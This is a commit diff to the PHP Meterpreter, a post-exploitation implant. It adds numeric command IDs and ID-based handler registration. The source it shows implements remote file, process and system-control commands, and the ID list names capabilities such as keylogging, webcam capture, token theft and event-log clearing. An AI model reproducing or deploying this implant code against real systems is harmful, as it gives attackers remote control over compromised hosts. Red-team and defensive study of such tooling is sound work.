
Update PHP meterpreter to support UINT command IDs

This commit is contained in:
OJ 2020-04-29 15:42:25 +10:00
parent c7f7bc2fc0
commit c9284388d9
No known key found for this signature in database
GPG Key ID: D5DC61FB93260597
2 changed files with 1079 additions and 896 deletions


@ -170,6 +170,127 @@ define("TLV_TYPE_POWER_REASON", TLV_META_TYPE_UINT | 4101);
# errors.
define("ERROR_CONNECTION_ERROR", 10000);
# ---------------------------------------------------------------
# --- THIS CONTENT WAS GENERATED BY A TOOL @ 2020-04-29 04:46:37 UTC
# IDs for stdapi
define('COMMAND_ID_STDAPI_FS_CHDIR', 1001);
define('COMMAND_ID_STDAPI_FS_CHMOD', 1002);
define('COMMAND_ID_STDAPI_FS_DELETE_DIR', 1003);
define('COMMAND_ID_STDAPI_FS_DELETE_FILE', 1004);
define('COMMAND_ID_STDAPI_FS_FILE_COPY', 1005);
define('COMMAND_ID_STDAPI_FS_FILE_EXPAND_PATH', 1006);
define('COMMAND_ID_STDAPI_FS_FILE_MOVE', 1007);
define('COMMAND_ID_STDAPI_FS_GETWD', 1008);
define('COMMAND_ID_STDAPI_FS_LS', 1009);
define('COMMAND_ID_STDAPI_FS_MD5', 1010);
define('COMMAND_ID_STDAPI_FS_MKDIR', 1011);
define('COMMAND_ID_STDAPI_FS_MOUNT_SHOW', 1012);
define('COMMAND_ID_STDAPI_FS_SEARCH', 1013);
define('COMMAND_ID_STDAPI_FS_SEPARATOR', 1014);
define('COMMAND_ID_STDAPI_FS_SHA1', 1015);
define('COMMAND_ID_STDAPI_FS_STAT', 1016);
define('COMMAND_ID_STDAPI_NET_CONFIG_ADD_ROUTE', 1017);
define('COMMAND_ID_STDAPI_NET_CONFIG_GET_ARP_TABLE', 1018);
define('COMMAND_ID_STDAPI_NET_CONFIG_GET_INTERFACES', 1019);
define('COMMAND_ID_STDAPI_NET_CONFIG_GET_NETSTAT', 1020);
define('COMMAND_ID_STDAPI_NET_CONFIG_GET_PROXY', 1021);
define('COMMAND_ID_STDAPI_NET_CONFIG_GET_ROUTES', 1022);
define('COMMAND_ID_STDAPI_NET_CONFIG_REMOVE_ROUTE', 1023);
define('COMMAND_ID_STDAPI_NET_RESOLVE_HOST', 1024);
define('COMMAND_ID_STDAPI_NET_RESOLVE_HOSTS', 1025);
define('COMMAND_ID_STDAPI_NET_SOCKET_TCP_SHUTDOWN', 1026);
define('COMMAND_ID_STDAPI_NET_TCP_CHANNEL_OPEN', 1027);
define('COMMAND_ID_STDAPI_RAILGUN_API', 1028);
define('COMMAND_ID_STDAPI_RAILGUN_API_MULTI', 1029);
define('COMMAND_ID_STDAPI_RAILGUN_MEMREAD', 1030);
define('COMMAND_ID_STDAPI_RAILGUN_MEMWRITE', 1031);
define('COMMAND_ID_STDAPI_REGISTRY_CHECK_KEY_EXISTS', 1032);
define('COMMAND_ID_STDAPI_REGISTRY_CLOSE_KEY', 1033);
define('COMMAND_ID_STDAPI_REGISTRY_CREATE_KEY', 1034);
define('COMMAND_ID_STDAPI_REGISTRY_DELETE_KEY', 1035);
define('COMMAND_ID_STDAPI_REGISTRY_DELETE_VALUE', 1036);
define('COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY', 1037);
define('COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY_DIRECT', 1038);
define('COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE', 1039);
define('COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE_DIRECT', 1040);
define('COMMAND_ID_STDAPI_REGISTRY_LOAD_KEY', 1041);
define('COMMAND_ID_STDAPI_REGISTRY_OPEN_KEY', 1042);
define('COMMAND_ID_STDAPI_REGISTRY_OPEN_REMOTE_KEY', 1043);
define('COMMAND_ID_STDAPI_REGISTRY_QUERY_CLASS', 1044);
define('COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE', 1045);
define('COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE_DIRECT', 1046);
define('COMMAND_ID_STDAPI_REGISTRY_SET_VALUE', 1047);
define('COMMAND_ID_STDAPI_REGISTRY_SET_VALUE_DIRECT', 1048);
define('COMMAND_ID_STDAPI_REGISTRY_UNLOAD_KEY', 1049);
define('COMMAND_ID_STDAPI_SYS_CONFIG_DRIVER_LIST', 1050);
define('COMMAND_ID_STDAPI_SYS_CONFIG_DROP_TOKEN', 1051);
define('COMMAND_ID_STDAPI_SYS_CONFIG_GETENV', 1052);
define('COMMAND_ID_STDAPI_SYS_CONFIG_GETPRIVS', 1053);
define('COMMAND_ID_STDAPI_SYS_CONFIG_GETSID', 1054);
define('COMMAND_ID_STDAPI_SYS_CONFIG_GETUID', 1055);
define('COMMAND_ID_STDAPI_SYS_CONFIG_LOCALTIME', 1056);
define('COMMAND_ID_STDAPI_SYS_CONFIG_REV2SELF', 1057);
define('COMMAND_ID_STDAPI_SYS_CONFIG_STEAL_TOKEN', 1058);
define('COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO', 1059);
define('COMMAND_ID_STDAPI_SYS_EVENTLOG_CLEAR', 1060);
define('COMMAND_ID_STDAPI_SYS_EVENTLOG_CLOSE', 1061);
define('COMMAND_ID_STDAPI_SYS_EVENTLOG_NUMRECORDS', 1062);
define('COMMAND_ID_STDAPI_SYS_EVENTLOG_OLDEST', 1063);
define('COMMAND_ID_STDAPI_SYS_EVENTLOG_OPEN', 1064);
define('COMMAND_ID_STDAPI_SYS_EVENTLOG_READ', 1065);
define('COMMAND_ID_STDAPI_SYS_POWER_EXITWINDOWS', 1066);
define('COMMAND_ID_STDAPI_SYS_PROCESS_ATTACH', 1067);
define('COMMAND_ID_STDAPI_SYS_PROCESS_CLOSE', 1068);
define('COMMAND_ID_STDAPI_SYS_PROCESS_EXECUTE', 1069);
define('COMMAND_ID_STDAPI_SYS_PROCESS_GET_INFO', 1070);
define('COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES', 1071);
define('COMMAND_ID_STDAPI_SYS_PROCESS_GETPID', 1072);
define('COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_IMAGES', 1073);
define('COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_PROC_ADDRESS', 1074);
define('COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_LOAD', 1075);
define('COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_UNLOAD', 1076);
define('COMMAND_ID_STDAPI_SYS_PROCESS_KILL', 1077);
define('COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_ALLOCATE', 1078);
define('COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_FREE', 1079);
define('COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_LOCK', 1080);
define('COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_PROTECT', 1081);
define('COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_QUERY', 1082);
define('COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_READ', 1083);
define('COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_UNLOCK', 1084);
define('COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_WRITE', 1085);
define('COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CLOSE', 1086);
define('COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CREATE', 1087);
define('COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_GET_THREADS', 1088);
define('COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_OPEN', 1089);
define('COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_QUERY_REGS', 1090);
define('COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_RESUME', 1091);
define('COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SET_REGS', 1092);
define('COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SUSPEND', 1093);
define('COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_TERMINATE', 1094);
define('COMMAND_ID_STDAPI_SYS_PROCESS_WAIT', 1095);
define('COMMAND_ID_STDAPI_UI_DESKTOP_ENUM', 1096);
define('COMMAND_ID_STDAPI_UI_DESKTOP_GET', 1097);
define('COMMAND_ID_STDAPI_UI_DESKTOP_SCREENSHOT', 1098);
define('COMMAND_ID_STDAPI_UI_DESKTOP_SET', 1099);
define('COMMAND_ID_STDAPI_UI_ENABLE_KEYBOARD', 1100);
define('COMMAND_ID_STDAPI_UI_ENABLE_MOUSE', 1101);
define('COMMAND_ID_STDAPI_UI_GET_IDLE_TIME', 1102);
define('COMMAND_ID_STDAPI_UI_GET_KEYS_UTF8', 1103);
define('COMMAND_ID_STDAPI_UI_SEND_KEYEVENT', 1104);
define('COMMAND_ID_STDAPI_UI_SEND_KEYS', 1105);
define('COMMAND_ID_STDAPI_UI_SEND_MOUSE', 1106);
define('COMMAND_ID_STDAPI_UI_START_KEYSCAN', 1107);
define('COMMAND_ID_STDAPI_UI_STOP_KEYSCAN', 1108);
define('COMMAND_ID_STDAPI_UI_UNLOCK_DESKTOP', 1109);
define('COMMAND_ID_STDAPI_WEBCAM_AUDIO_RECORD', 1110);
define('COMMAND_ID_STDAPI_WEBCAM_GET_FRAME', 1111);
define('COMMAND_ID_STDAPI_WEBCAM_LIST', 1112);
define('COMMAND_ID_STDAPI_WEBCAM_START', 1113);
define('COMMAND_ID_STDAPI_WEBCAM_STOP', 1114);
# ---------------------------------------------------------------
# Wrap everything in checks for existence of the new functions in case we get
# eval'd twice
my_print("Evaling stdapi");
@ -319,7 +440,7 @@ function add_stat_buf($path) {
# traditionally used this to get environment variables from the server.
#
if (!function_exists('stdapi_fs_file_expand_path')) {
register_command('stdapi_fs_file_expand_path');
register_command('stdapi_fs_file_expand_path', COMMAND_ID_STDAPI_FS_FILE_EXPAND_PATH);
function stdapi_fs_file_expand_path($req, &$pkt) {
my_print("doing expand_path");
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
@ -358,7 +479,7 @@ function stdapi_fs_file_expand_path($req, &$pkt) {
}
if (!function_exists('stdapi_fs_delete_dir')) {
register_command('stdapi_fs_delete_dir');
register_command('stdapi_fs_delete_dir', COMMAND_ID_STDAPI_FS_DELETE_DIR);
function stdapi_fs_delete_dir($req, &$pkt) {
my_print("doing rmdir");
$path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
@ -368,7 +489,7 @@ function stdapi_fs_delete_dir($req, &$pkt) {
}
if (!function_exists('stdapi_fs_mkdir')) {
register_command('stdapi_fs_mkdir');
register_command('stdapi_fs_mkdir', COMMAND_ID_STDAPI_FS_MKDIR);
function stdapi_fs_mkdir($req, &$pkt) {
my_print("doing mkdir");
$path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
@ -379,7 +500,7 @@ function stdapi_fs_mkdir($req, &$pkt) {
# works
if (!function_exists('stdapi_fs_chdir')) {
register_command('stdapi_fs_chdir');
register_command('stdapi_fs_chdir', COMMAND_ID_STDAPI_FS_CHDIR);
function stdapi_fs_chdir($req, &$pkt) {
my_print("doing chdir");
$path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
@ -388,24 +509,9 @@ function stdapi_fs_chdir($req, &$pkt) {
}
}
# works
if (!function_exists('stdapi_fs_delete')) {
register_command('stdapi_fs_delete');
function stdapi_fs_delete($req, &$pkt) {
my_print("doing delete");
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_NAME);
$path = canonicalize_path($path_tlv['value']);
if (is_windows()) {
exec("attrib.exe -r ".$path);
}
$ret = @unlink($path);
return $ret ? ERROR_SUCCESS : ERROR_FAILURE;
}
}
# works
if (!function_exists('stdapi_fs_file_move')) {
register_command('stdapi_fs_file_move');
register_command('stdapi_fs_file_move', COMMAND_ID_STDAPI_FS_FILE_MOVE);
function stdapi_fs_file_move($req, &$pkt) {
my_print("doing mv");
$old_file_tlv = packet_get_tlv($req, TLV_TYPE_FILE_NAME);
@ -419,7 +525,7 @@ function stdapi_fs_file_move($req, &$pkt) {
# works
if (!function_exists('stdapi_fs_file_copy')) {
register_command('stdapi_fs_file_copy');
register_command('stdapi_fs_file_copy', COMMAND_ID_STDAPI_FS_FILE_COPY);
function stdapi_fs_file_copy($req, &$pkt) {
my_print("doing cp");
$old_file_tlv = packet_get_tlv($req, TLV_TYPE_FILE_NAME);
@ -433,7 +539,7 @@ function stdapi_fs_file_copy($req, &$pkt) {
# works on Unix systems but probably not on Windows
if (!function_exists('stdapi_fs_chmod') && !is_windows()) {
register_command('stdapi_fs_chmod');
register_command('stdapi_fs_chmod', COMMAND_ID_STDAPI_FS_CHMOD);
function stdapi_fs_chmod($req, &$pkt) {
my_print("doing chmod");
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
@ -447,7 +553,7 @@ function stdapi_fs_chmod($req, &$pkt) {
# works
if (!function_exists('stdapi_fs_getwd')) {
register_command('stdapi_fs_getwd');
register_command('stdapi_fs_getwd', COMMAND_ID_STDAPI_FS_GETWD);
function stdapi_fs_getwd($req, &$pkt) {
my_print("doing pwd");
packet_add_tlv($pkt, create_tlv(TLV_TYPE_DIRECTORY_PATH, getcwd()));
@ -458,7 +564,7 @@ function stdapi_fs_getwd($req, &$pkt) {
# works partially, need to get the path argument to mean the same thing as in
# windows
if (!function_exists('stdapi_fs_ls')) {
register_command('stdapi_fs_ls');
register_command('stdapi_fs_ls', COMMAND_ID_STDAPI_FS_LS);
function stdapi_fs_ls($req, &$pkt) {
my_print("doing ls");
$path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
@ -485,7 +591,7 @@ function stdapi_fs_ls($req, &$pkt) {
}
if (!function_exists('stdapi_fs_separator')) {
register_command('stdapi_fs_separator');
register_command('stdapi_fs_separator', COMMAND_ID_STDAPI_FS_SEPARATOR);
function stdapi_fs_separator($req, &$pkt) {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_STRING, DIRECTORY_SEPARATOR));
return ERROR_SUCCESS;
@ -493,7 +599,7 @@ function stdapi_fs_separator($req, &$pkt) {
}
if (!function_exists('stdapi_fs_stat')) {
register_command('stdapi_fs_stat');
register_command('stdapi_fs_stat', COMMAND_ID_STDAPI_FS_STAT);
function stdapi_fs_stat($req, &$pkt) {
my_print("doing stat");
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
@ -510,7 +616,7 @@ function stdapi_fs_stat($req, &$pkt) {
# works
if (!function_exists('stdapi_fs_delete_file')) {
register_command('stdapi_fs_delete_file');
register_command('stdapi_fs_delete_file', COMMAND_ID_STDAPI_FS_DELETE_FILE);
function stdapi_fs_delete_file($req, &$pkt) {
my_print("doing delete");
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
@ -526,7 +632,7 @@ function stdapi_fs_delete_file($req, &$pkt) {
}
if (!function_exists('stdapi_fs_search')) {
register_command('stdapi_fs_search');
register_command('stdapi_fs_search', COMMAND_ID_STDAPI_FS_SEARCH);
function stdapi_fs_search($req, &$pkt) {
my_print("doing search");
@ -566,7 +672,7 @@ function stdapi_fs_search($req, &$pkt) {
if (!function_exists('stdapi_fs_md5')) {
register_command("stdapi_fs_md5");
register_command("stdapi_fs_md5", COMMAND_ID_STDAPI_FS_MD5);
function stdapi_fs_md5($req, &$pkt) {
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
$path = canonicalize_path($path_tlv['value']);
@ -584,7 +690,7 @@ function stdapi_fs_md5($req, &$pkt) {
if (!function_exists('stdapi_fs_sha1')) {
register_command("stdapi_fs_sha1");
register_command("stdapi_fs_sha1", COMMAND_ID_STDAPI_FS_SHA1);
function stdapi_fs_sha1($req, &$pkt) {
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
$path = canonicalize_path($path_tlv['value']);
@ -605,9 +711,8 @@ function stdapi_fs_sha1($req, &$pkt) {
# works
if (!function_exists('stdapi_sys_config_getuid')) {
register_command('stdapi_sys_config_getuid');
register_command('stdapi_sys_config_getuid', COMMAND_ID_STDAPI_SYS_CONFIG_GETUID);
function stdapi_sys_config_getuid($req, &$pkt) {
my_print("doing getuid");
if (is_callable('posix_getuid')) {
$uid = posix_getuid();
$pwinfo = posix_getpwuid($uid);
@ -618,13 +723,14 @@ function stdapi_sys_config_getuid($req, &$pkt) {
# instead.
$user = get_current_user() . " (" . getmyuid() . ")";
}
my_print("getuid - returning: " . $user);
packet_add_tlv($pkt, create_tlv(TLV_TYPE_USER_NAME, $user));
return ERROR_SUCCESS;
}
}
if (!function_exists('stdapi_sys_config_getenv')) {
register_command('stdapi_sys_config_getenv');
register_command('stdapi_sys_config_getenv', COMMAND_ID_STDAPI_SYS_CONFIG_GETENV);
function stdapi_sys_config_getenv($req, &$pkt) {
my_print("doing getenv");
@ -658,18 +764,9 @@ function stdapi_sys_config_getenv($req, &$pkt) {
}
# Unimplemented becuase it's unimplementable
#if (!function_exists('stdapi_sys_config_rev2self')) {
#register_command('stdapi_sys_config_rev2self');
#function stdapi_sys_config_rev2self($req, &$pkt) {
# my_print("doing rev2self");
# return ERROR_FAILURE;
#}
#}
# works
if (!function_exists('stdapi_sys_config_sysinfo')) {
register_command('stdapi_sys_config_sysinfo');
register_command('stdapi_sys_config_sysinfo', COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO);
function stdapi_sys_config_sysinfo($req, &$pkt) {
my_print("doing sysinfo");
packet_add_tlv($pkt, create_tlv(TLV_TYPE_COMPUTER_NAME, php_uname("n")));
@ -679,7 +776,7 @@ function stdapi_sys_config_sysinfo($req, &$pkt) {
}
if (!function_exists('stdapi_sys_config_localtime')) {
register_command('stdapi_sys_config_localtime');
register_command('stdapi_sys_config_localtime', COMMAND_ID_STDAPI_SYS_CONFIG_LOCALTIME);
function stdapi_sys_config_localtime($req, &$pkt) {
my_print("doing localtime");
packet_add_tlv($pkt, create_tlv(TLV_TYPE_LOCAL_DATETIME, strftime("%Y-%m-%d %H:%M:%S %Z (UTC%z)")));
@ -691,7 +788,7 @@ function stdapi_sys_config_localtime($req, &$pkt) {
$GLOBALS['processes'] = array();
if (!function_exists('stdapi_sys_process_execute')) {
register_command('stdapi_sys_process_execute');
register_command('stdapi_sys_process_execute', COMMAND_ID_STDAPI_SYS_PROCESS_EXECUTE);
function stdapi_sys_process_execute($req, &$pkt) {
global $channel_process_map, $processes;
@ -766,7 +863,7 @@ function stdapi_sys_process_execute($req, &$pkt) {
if (!function_exists('stdapi_sys_process_close')) {
register_command('stdapi_sys_process_close');
register_command('stdapi_sys_process_close', COMMAND_ID_STDAPI_SYS_PROCESS_CLOSE);
function stdapi_sys_process_close($req, &$pkt) {
global $processes;
my_print("doing process_close");
@ -820,7 +917,7 @@ function close_process($proc) {
# to decide what options to send to ps for portability and for information
# usefulness.
if (!function_exists('stdapi_sys_process_get_processes')) {
register_command('stdapi_sys_process_get_processes');
register_command('stdapi_sys_process_get_processes', COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES);
function stdapi_sys_process_get_processes($req, &$pkt) {
my_print("doing get_processes");
$list = array();
@ -870,7 +967,7 @@ function stdapi_sys_process_get_processes($req, &$pkt) {
# works
if (!function_exists('stdapi_sys_process_getpid')) {
register_command('stdapi_sys_process_getpid');
register_command('stdapi_sys_process_getpid', COMMAND_ID_STDAPI_SYS_PROCESS_GETPID);
function stdapi_sys_process_getpid($req, &$pkt) {
my_print("doing getpid");
packet_add_tlv($pkt, create_tlv(TLV_TYPE_PID, getmypid()));
@ -879,7 +976,7 @@ function stdapi_sys_process_getpid($req, &$pkt) {
}
if (!function_exists('stdapi_sys_process_kill')) {
register_command('stdapi_sys_process_kill');
register_command('stdapi_sys_process_kill', COMMAND_ID_STDAPI_SYS_PROCESS_KILL);
function stdapi_sys_process_kill($req, &$pkt) {
# The existence of posix_kill is unlikely (it's a php compile-time option
# that isn't enabled by default, but better to try it and avoid shelling
@ -910,7 +1007,7 @@ function stdapi_sys_process_kill($req, &$pkt) {
}
if (!function_exists('stdapi_net_socket_tcp_shutdown')) {
register_command('stdapi_net_socket_tcp_shutdown');
register_command('stdapi_net_socket_tcp_shutdown', COMMAND_ID_STDAPI_NET_SOCKET_TCP_SHUTDOWN);
function stdapi_net_socket_tcp_shutdown($req, &$pkt) {
my_print("doing stdapi_net_socket_tcp_shutdown");
$cid_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
@ -952,7 +1049,7 @@ function deregister_registry_key($id) {
if (!function_exists('stdapi_registry_create_key')) {
if (is_windows() and is_callable('reg_open_key')) {
register_command('stdapi_registry_create_key');
register_command('stdapi_registry_create_key', COMMAND_ID_STDAPI_REGISTRY_CREATE_KEY);
}
function stdapi_registry_create_key($req, &$pkt) {
my_print("doing stdapi_registry_create_key");
@ -988,7 +1085,7 @@ function stdapi_registry_create_key($req, &$pkt) {
if (!function_exists('stdapi_registry_close_key')) {
if (is_windows() and is_callable('reg_open_key')) {
register_command('stdapi_registry_close_key');
register_command('stdapi_registry_close_key', COMMAND_ID_STDAPI_REGISTRY_CLOSE_KEY);
}
function stdapi_registry_close_key($req, &$pkt) {
if (is_windows() and is_callable('reg_open_key')) {
@ -1009,7 +1106,7 @@ function stdapi_registry_close_key($req, &$pkt) {
if (!function_exists('stdapi_registry_query_value')) {
if (is_windows() and is_callable('reg_open_key')) {
register_command('stdapi_registry_query_value');
register_command('stdapi_registry_query_value', COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE);
}
function stdapi_registry_query_value($req, &$pkt) {
if (is_windows() and is_callable('reg_open_key')) {
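Review bot: The generated `define('COMMAND_ID_STDAPI_…', …)` block added at the top of this section is not guarded against re-evaluation, even though the comment right below it explains that the rest of the file is wrapped in `function_exists` checks because it may be eval'd twice; on a second eval each `define()` of an already-defined constant raises a PHP notice/warning ("Constant … already defined", severity depends on PHP version) for all 114 IDs. Since the block is emitted by a generator, the guard probably belongs in its template, e.g. opening with `if (!defined('COMMAND_ID_STDAPI_FS_CHDIR')) {` and closing after the last `define` — one sentinel suffices because the block is generated as a unit. The metsrv ID block in the second file has the same shape, though whether that file can be eval'd twice is not stated on the page.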


@ -30,16 +30,15 @@ if (!isset($GLOBALS['readers'])) {
$GLOBALS['readers'] = array();
}
# global list of extension commands
if (!isset($GLOBALS['commands'])) {
$GLOBALS['commands'] = array("core_loadlib", "core_machine_id", "core_set_uuid",
"core_set_session_guid", "core_get_session_guid", "core_negotiate_tlv_encryption");
# global map of command ids to callable handlers
if (!isset($GLOBALS['id2f'])) {
$GLOBALS['id2f'] = array();
}
function register_command($c) {
global $commands;
if (! in_array($c, $commands)) {
array_push($commands, $c);
function register_command($c, $i) {
global $id2f;
if (! in_array($i, $id2f)) {
$id2f[$i] = $c;
}
}
@ -82,7 +81,7 @@ function dump_channels($extra="") {
# Doesn't exist before php 4.3
if (!function_exists("file_get_contents")) {
function file_get_contents($file) {
function file_get_contents($file) {
$f = @fopen($file,"rb");
$contents = false;
if ($f) {
@ -90,14 +89,14 @@ function file_get_contents($file) {
}
fclose($f);
return $contents;
}
}
}
# Renamed in php 4.3
if (!function_exists('socket_set_option')) {
function socket_set_option($sock, $type, $opt, $value) {
function socket_set_option($sock, $type, $opt, $value) {
socket_setopt($sock, $type, $opt, $value);
}
}
}
#
@ -149,11 +148,12 @@ define("TLV_EXTENSIONS", 20000);
define("TLV_USER", 40000);
define("TLV_TEMP", 60000);
#
# TLV Specific Types
#
define("TLV_TYPE_ANY", TLV_META_TYPE_NONE | 0);
define("TLV_TYPE_METHOD", TLV_META_TYPE_STRING | 1);
define("TLV_TYPE_COMMAND_ID", TLV_META_TYPE_UINT | 1);
define("TLV_TYPE_REQUEST_ID", TLV_META_TYPE_STRING | 2);
define("TLV_TYPE_EXCEPTION", TLV_META_TYPE_GROUP | 3);
define("TLV_TYPE_RESULT", TLV_META_TYPE_UINT | 4);
@ -200,13 +200,53 @@ function is_windows() {
return (strtoupper(substr(PHP_OS,0,3)) == "WIN");
}
# ---------------------------------------------------------------
# --- THIS CONTENT WAS GENERATED BY A TOOL @ 2020-04-29 04:46:37 UTC
# IDs for metsrv
define('COMMAND_ID_CORE_CHANNEL_CLOSE', 1);
define('COMMAND_ID_CORE_CHANNEL_EOF', 2);
define('COMMAND_ID_CORE_CHANNEL_INTERACT', 3);
define('COMMAND_ID_CORE_CHANNEL_OPEN', 4);
define('COMMAND_ID_CORE_CHANNEL_READ', 5);
define('COMMAND_ID_CORE_CHANNEL_SEEK', 6);
define('COMMAND_ID_CORE_CHANNEL_TELL', 7);
define('COMMAND_ID_CORE_CHANNEL_WRITE', 8);
define('COMMAND_ID_CORE_CONSOLE_WRITE', 9);
define('COMMAND_ID_CORE_ENUMEXTCMD', 10);
define('COMMAND_ID_CORE_GET_SESSION_GUID', 11);
define('COMMAND_ID_CORE_LOADLIB', 12);
define('COMMAND_ID_CORE_MACHINE_ID', 13);
define('COMMAND_ID_CORE_MIGRATE', 14);
define('COMMAND_ID_CORE_NATIVE_ARCH', 15);
define('COMMAND_ID_CORE_NEGOTIATE_TLV_ENCRYPTION', 16);
define('COMMAND_ID_CORE_PATCH_URL', 17);
define('COMMAND_ID_CORE_PIVOT_ADD', 18);
define('COMMAND_ID_CORE_PIVOT_REMOVE', 19);
define('COMMAND_ID_CORE_PIVOT_SESSION_DIED', 20);
define('COMMAND_ID_CORE_SET_SESSION_GUID', 21);
define('COMMAND_ID_CORE_SET_UUID', 22);
define('COMMAND_ID_CORE_SHUTDOWN', 23);
define('COMMAND_ID_CORE_TRANSPORT_ADD', 24);
define('COMMAND_ID_CORE_TRANSPORT_CHANGE', 25);
define('COMMAND_ID_CORE_TRANSPORT_GETCERTHASH', 26);
define('COMMAND_ID_CORE_TRANSPORT_LIST', 27);
define('COMMAND_ID_CORE_TRANSPORT_NEXT', 28);
define('COMMAND_ID_CORE_TRANSPORT_PREV', 29);
define('COMMAND_ID_CORE_TRANSPORT_REMOVE', 30);
define('COMMAND_ID_CORE_TRANSPORT_SETCERTHASH', 31);
define('COMMAND_ID_CORE_TRANSPORT_SET_TIMEOUTS', 32);
define('COMMAND_ID_CORE_TRANSPORT_SLEEP', 33);
# ---------------------------------------------------------------
##
# Worker functions
##
function core_channel_open($req, &$pkt) {
if (!function_exists('core_channel_open')) {
register_command('core_channel_open', COMMAND_ID_CORE_CHANNEL_OPEN);
function core_channel_open($req, &$pkt) {
$type_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_TYPE);
my_print("Client wants a ". $type_tlv['value'] ." channel, i'll see what i can do");
@ -223,10 +263,13 @@ function core_channel_open($req, &$pkt) {
}
return $ret;
}
}
# Works for streams
function core_channel_eof($req, &$pkt) {
if (!function_exists('core_channel_eof')) {
register_command('core_channel_eof', COMMAND_ID_CORE_CHANNEL_EOF);
function core_channel_eof($req, &$pkt) {
my_print("doing channel eof");
$chan_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
$c = get_channel_by_id($chan_tlv['value']);
@ -241,10 +284,13 @@ function core_channel_eof($req, &$pkt) {
} else {
return ERROR_FAILURE;
}
}
}
# Works
function core_channel_read($req, &$pkt) {
if (!function_exists('core_channel_read')) {
register_command('core_channel_read', COMMAND_ID_CORE_CHANNEL_READ);
function core_channel_read($req, &$pkt) {
my_print("doing channel read");
$chan_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
$len_tlv = packet_get_tlv($req, TLV_TYPE_LENGTH);
@ -258,10 +304,13 @@ function core_channel_read($req, &$pkt) {
$res = ERROR_SUCCESS;
}
return $res;
}
}
# Works
function core_channel_write($req, &$pkt) {
if (!function_exists('core_channel_write')) {
register_command('core_channel_write', COMMAND_ID_CORE_CHANNEL_WRITE);
function core_channel_write($req, &$pkt) {
#my_print("doing channel write");
$chan_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
$data_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_DATA);
@ -277,12 +326,15 @@ function core_channel_write($req, &$pkt) {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_LENGTH, $wrote));
return ERROR_SUCCESS;
}
}
}
#
# This is called when the client wants to close a channel explicitly. Not to be confused with
# This is called when the client wants to close a channel explicitly.
#
function core_channel_close($req, &$pkt) {
if (!function_exists('core_channel_close')) {
register_command('core_channel_close', COMMAND_ID_CORE_CHANNEL_CLOSE);
function core_channel_close($req, &$pkt) {
global $channel_process_map;
# XXX remove the closed channel from $readers
my_print("doing channel close");
@ -310,12 +362,14 @@ function core_channel_close($req, &$pkt) {
dump_channels("after close");
return ERROR_FAILURE;
}
}
#
# Destroy a channel and all associated handles.
#
function channel_close_handles($cid) {
if (!function_exists('channel_close_handles')) {
function channel_close_handles($cid) {
global $channels;
# Sanity check - make sure a channel with the given cid exists
@ -337,6 +391,7 @@ function channel_close_handles($cid) {
if (strlen($c['data']) == 0) {
channel_remove($cid);
}
}
}
function channel_remove($cid) {
@ -344,7 +399,9 @@ function channel_remove($cid) {
unset($channels[$cid]);
}
function core_channel_interact($req, &$pkt) {
if (!function_exists('core_channel_interact')) {
register_command('core_channel_interact', COMMAND_ID_CORE_CHANNEL_INTERACT);
function core_channel_interact($req, &$pkt) {
global $readers;
my_print("doing channel interact");
@ -395,6 +452,7 @@ function core_channel_interact($req, &$pkt) {
$ret = ERROR_FAILURE;
}
return $ret;
}
}
function interacting($cid) {
@ -407,25 +465,30 @@ function interacting($cid) {
}
function core_shutdown($req, &$pkt) {
if (!function_exists('core_shutdown')) {
register_command('core_shutdown', COMMAND_ID_CORE_SHUTDOWN);
function core_shutdown($req, &$pkt) {
my_print("doing core shutdown");
die();
}
}
# zlib support is not compiled in by default, so this makes sure the library
# isn't compressed before eval'ing it
# TODO: check for zlib support and decompress if possible
function core_loadlib($req, &$pkt) {
global $commands;
